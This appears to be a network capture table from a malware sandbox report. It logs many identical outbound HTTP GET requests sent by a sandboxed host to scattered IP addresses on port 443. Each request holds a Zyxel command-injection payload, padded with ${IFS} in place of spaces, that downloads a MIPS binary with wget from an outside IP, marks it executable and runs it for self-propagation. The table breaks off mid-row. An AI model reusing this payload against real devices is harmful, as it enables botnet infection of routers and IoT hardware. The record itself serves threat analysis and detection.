                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799000978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1416192.168.2.1341408184.160.189.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799043894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1417192.168.2.1338384210.153.216.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799103975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1418192.168.2.133411836.85.39.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799123049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1419192.168.2.1338764105.214.202.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799166918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1420192.168.2.1339704189.236.129.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799226046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1421192.168.2.133528082.35.58.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799252033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1422192.168.2.1359558220.141.116.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799289942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1423192.168.2.1356254196.9.67.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799341917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1424192.168.2.135084224.92.78.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799375057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1425192.168.2.133397487.190.175.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799400091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1426192.168.2.135466265.222.105.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799443007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1427192.168.2.133635819.227.76.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799468040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1428192.168.2.1349592213.55.239.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799535036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1429192.168.2.13470604.44.44.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799587011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1430192.168.2.1358838207.175.151.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799619913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1431192.168.2.1356966162.34.123.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799690008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1432192.168.2.1340840103.53.49.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799707890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1433192.168.2.135307269.48.155.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799767971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1434192.168.2.134988244.221.62.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799799919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1435192.168.2.1347390163.193.199.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799803019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1436192.168.2.1352962162.211.102.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799889088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1437192.168.2.133782464.42.115.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799895048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1438192.168.2.1339414207.5.19.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.799922943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1439192.168.2.1340078223.30.0.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800012112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1440192.168.2.1335396129.224.123.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800046921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1441192.168.2.134136896.30.169.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800066948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1442192.168.2.133612651.51.166.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800110102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1443192.168.2.134367464.75.94.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800169945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1444192.168.2.134034686.36.235.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800204039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1445192.168.2.133300899.117.14.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800228119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1446192.168.2.135121477.0.235.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800272942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1447192.168.2.135674819.176.215.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800307989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1448192.168.2.1334386167.221.251.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800362110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1449192.168.2.1359406163.101.49.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800393105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1450192.168.2.134755227.64.205.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800422907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1451192.168.2.133923069.150.194.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800457954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1452192.168.2.1359212130.206.235.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800524950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1453192.168.2.135241272.169.252.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800554037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1454192.168.2.133344458.52.92.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800616026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1455192.168.2.133877445.164.83.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800633907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1456192.168.2.1346398116.112.10.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800689936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1457192.168.2.1348512176.204.247.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800730944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1458192.168.2.1350840126.30.142.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800792933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1459192.168.2.1354368189.204.29.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800826073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1460192.168.2.1357630136.34.174.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800864935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1461192.168.2.1343246108.175.145.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800888062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1462192.168.2.1350232172.240.216.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800942898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1463192.168.2.1357362222.185.159.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.800987959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1464192.168.2.13334201.172.27.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801035881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1465192.168.2.1333358134.12.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801040888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1466192.168.2.1343280111.193.164.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801068068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1467192.168.2.1353428189.135.44.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801100969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1468192.168.2.1332918168.201.122.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801151037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1469192.168.2.133509467.98.154.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801191092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1470192.168.2.133790213.90.127.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801218033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1471192.168.2.1351450141.83.245.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801265955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1472192.168.2.1341952159.38.132.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801307917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1473192.168.2.1347528203.6.11.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801327944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1474192.168.2.1360196151.30.202.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801392078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1475192.168.2.134656497.197.36.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801417112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1476192.168.2.1357620150.70.93.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801460028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1477192.168.2.1343312104.105.63.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801506996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1478192.168.2.1357602137.0.65.181443
                                                  TimestampBytes transferredDirectionData
